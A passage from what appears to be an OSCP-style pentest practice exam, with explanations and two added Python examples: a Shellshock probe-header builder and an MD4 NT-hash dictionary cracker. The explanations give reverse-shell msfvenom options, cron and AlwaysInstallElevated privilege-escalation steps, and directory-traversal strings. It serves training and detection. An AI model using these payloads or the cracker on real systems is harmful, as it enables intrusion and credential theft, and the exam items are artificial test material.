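    whereas a 500 only shows the server choked on the injected command."""
    payload = "() { :;}; echo; echo %s" % marker
    return {"User-Agent": payload, "Referer": payload}


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
    print(probe_headers("oscp-check"))
```

The second sample line is the interesting one for detection: a 200 with the payload in the Referer is exactly what a successful echo-based probe looks like, so alerting on the status code alone (option A) misses it.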

D) Generate Metasploit payloads.
**Answer:** A
**Explanation:** enum4linux (and its rewrite enum4linux-ng) wraps rpcclient, smbclient, net and nmblookup to pull users, groups, shares, OS details and the password policy over SMB, usually starting from a null session (enum4linux -a target). It generates no payloads.

**Question 56.** In a Windows environment, which attribute in Active Directory stores the password hash of a user?
A) sAMAccountName
B) userPassword
C) unicodePwd
D) objectSid
**Answer:** C
**Explanation:** unicodePwd holds the account's NT hash (MD4 over the UTF-16LE password) inside the NTDS.dit database, where it is additionally encrypted with the Password Encryption Key. It is never readable over LDAP: the attribute is write-only, and a write must carry the new clear-text password over an encrypted connection. Attackers obtain it through DCSync (DRSUAPI replication, as secretsdump.py does) or from a copy of NTDS.dit plus the SYSTEM hive. The obsolete LM hash sits in dBCSPwd; sAMAccountName and objectSid are identifiers.

**Question 57.** Which of the following is a common method to exploit a vulnerable cron job that executes a script from /tmp with root privileges?
A) Replace the script in /tmp with a malicious one.
B) Delete the cron entry.
C) Change the script's permissions to 600.
D) Restart the cron service.
**Answer:** A
**Explanation:** A root cron job that runs a script in a directory the attacker can write to (or a script that is itself world-writable) can be replaced or appended with commands that run as root on the next schedule, for example a reverse shell or chmod +s /bin/bash. Look for such paths in /etc/crontab and /etc/cron.d, and use pspy to watch the jobs fire when root's crontab itself is unreadable.

**Question 58.** Which option for msfvenom creates a Linux ELF reverse shell that is statically linked?
A) -f elf -p linux/x86/meterpreter/reverse_tcp -b "\x00"
B) -f elf -p linux/x86/shell_reverse_tcp -e x86/shikata_ga_nai -i 5
C) -f elf -p linux/x86/meterpreter_reverse_tcp -a x86 --platform Linux
D) -f elf -p linux/x86/shell_reverse_tcp -b "\x00"
**Answer:** D
**Explanation:** linux/x86/shell_reverse_tcp is a single-stage shellcode payload; with -f elf msfvenom wraps it in a minimal ELF stub that maps the shellcode and jumps to it, so the result has no dynamic libc dependency and runs on most x86 Linux targets regardless of library versions. -b "\x00" makes msfvenom encode the shellcode to avoid null bytes, which matters when the same payload is injected into a string-based buffer overflow, not for the ELF file itself. Option A is the staged Meterpreter, which needs its second stage from the handler, and C is the stageless Meterpreter, far larger and tied to the matching handler.

**Question 59.** Which of the following is the most reliable way to verify that a web server is vulnerable to directory traversal?
A) Request /../../../../etc/passwd and check for the presence of "root:x".
B) Scan the server with Nmap.
C) Perform a DNS zone transfer.
D) Use whois on the IP address.
**Answer:** A
**Explanation:** Fetching a known file through the traversal and seeing its contents (root:x:0:0: for /etc/passwd, or C:\Windows\win.ini on Windows) is direct proof. If a filter strips ../, try URL-encoded forms (%2e%2e%2f) or ....//, which collapses to ../ after one pass of stripping. Scanning, zone transfers and whois never touch the application's file handling.

**Question 60.** Which of the following Windows commands can be used to query the local security policy for the "AlwaysInstallElevated" setting?
A) secpol.msc
B) reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C) gpresult /r
D) net accounts
**Answer:** B
**Explanation:** The value lives under HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and under the same path in HKCU; query both, because the policy only takes effect when both return 0x1. secpol.msc is a GUI console, gpresult /r lists applied GPOs without their values, and net accounts shows the password policy.

**Question 61.** Which of the following is the most effective way to enumerate LDAP information from a Windows domain controller without credentials?
A) Anonymous bind to LDAP using ldapsearch -x -h dc.example.com -b "" "(objectclass=*)"
B) Use net view on the domain controller.
C) Perform a TCP SYN scan on port 389.
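To make concrete what the unicodePwd attribute of Question 56 actually holds (and, by the same token, the SAM hashes of Question 31 and the RC4-HMAC Kerberos keys behind Question 12), here is an added example that is not part of the original exam material: a pure-Python MD4 that computes NT hashes and runs the kind of offline dictionary attack that Kerberoasting and NTDS dumps enable. hashlib is not used because md4 is unavailable on many current OpenSSL builds; the wordlist is constructed.

```python
import struct


def md4(data):
    """MD4 as specified in RFC 1320 (written out because hashlib.new('md4')
    is missing on many OpenSSL 3 builds)."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    round2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    round3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, rotl((a + g(b, c, d) + x[round2[i]] + 0x5A827999) & mask,
                                 (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, rotl((a + h(b, c, d) + x[round3[i]] + 0x6ED9EBA1) & mask,
                                 (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """The NT hash: MD4 over the UTF-16LE encoding of the password. There is no
    salt, so identical passwords give identical hashes across users and
    domains, which is what makes pass-the-hash and precomputed cracking work.
    The same value is the RC4-HMAC (etype 23) Kerberos key, which is why
    Kerberoasted tickets crack straight to the service account password."""
    return md4(password.encode("utf-16-le")).hex()


def crack_nt(target_hex, wordlist):
    """Offline dictionary attack against one NT hash: one MD4 per candidate,
    no interaction with the target."""
    target = target_hex.lower()
    for candidate in wordlist:
        if nt_hash(candidate) == target:
            return candidate
    return None


# Constructed wordlist for the demonstration (not a real dump).
WORDLIST = ["letmein", "Winter2024!", "password", "Summer2025"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password"))
    print("cracked:", crack_nt("8846f7eaee8fb117ad06bdd830b7586c", WORDLIST))
```

The speed of this loop is the security point: MD4 is cheap and unsalted, so a GPU cracker tests billions of candidates per second against an NTDS dump, and a Kerberoasted RC4 ticket falls just as quickly. AES Kerberos keys (etypes 17 and 18) are derived with PBKDF2 and a salt, which is why enforcing AES on service accounts matters.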